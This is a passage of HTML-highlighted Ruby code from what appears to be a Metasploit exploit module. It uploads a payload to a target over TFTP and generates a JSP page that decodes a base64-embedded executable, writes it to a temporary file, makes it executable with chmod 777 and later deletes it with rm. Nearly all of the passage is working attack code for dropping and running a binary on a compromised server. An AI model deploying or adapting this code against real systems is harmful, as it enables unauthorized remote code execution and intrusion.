class=\"crayon-v\">lport<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">datastore<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;LPORT&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1025<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0xffff<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1025<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">lhost<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">datastore<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;LHOST&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0.0.0.0&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">remote_file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;.jsp&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-83\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tftp_client<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Proto<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">TFTP<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Client<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;LocalHost&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lhost<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;LocalPort&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lport<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;PeerHost&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rhost<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;PeerPort&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">datastore<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;RPORT_TFTP&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;LocalFile&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;DATA:#{payload}&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;RemoteFile&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">remote_file<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;Mode&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;octet&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;Context&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;Msf&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">framework<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;MsfExploit&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;Action&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-i\">upload<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">print<\/span><span class=\"crayon-sy\">_<\/span>status<span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Uploading TFTP payload to #{rhost}:#{datastore[&#8216;TFTP_PORT&#8217;]} as &#8216;#{remote_file}'&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tftp_client<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send_write_request<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-97\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-98\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">remote_file<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-99\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-100\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-101\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">generate_jsp_payload<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-102\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">exe<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">generate_payload_exe<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-103\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">base64_exe<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Text<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode_base64<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">exe<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-104\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">native_payload_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-106\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-107\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_raw<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-108\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_ostream<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_pstream<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_buf<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_decoder<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_tmp<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_path<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-114\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_tmp2<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_path2<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-116\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_proc2<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-117\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_proc1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Text<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">chmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">Q<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Process<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#{var_proc1} = Runtime.getRuntime().exec(&#8220;chmod 777 &#8221; + #{var_path} + &#8221; &#8221; + #{var_path2});<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Thread<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-123\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_proc3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Text<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-125\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cleanup<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">Q<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-126\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Thread<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-127\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Process<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#{var_proc3} = Runtime.getRuntime().exec(&#8220;rm &#8221; + #{var_path} + &#8221; &#8221; + #{var_path2});<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-128\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-129\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-130\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">Q<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-131\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;%<\/span><span class=\"crayon-v\">@page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">import<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;java.io.*&#8221;<\/span><span class=\"crayon-ta\">%&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;%<\/span><span class=\"crayon-v\">@page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">import<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;sun.misc.BASE64Decoder&#8221;<\/span><span class=\"crayon-ta\">%&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-133\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;%<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_buf} = &#8220;#{base64_exe}&#8221;;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-136\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">BASE64Decoder<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_decoder} = new BASE64Decoder();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-137\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">byte<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-138\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">File<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_tmp} = File.createTempFile(&#8220;#{native_payload_name}&#8221;, &#8220;.bin&#8221;);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-140\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_path} = #{var_tmp}.getAbsolutePath();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-141\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">BufferedOutputStream<\/span><span 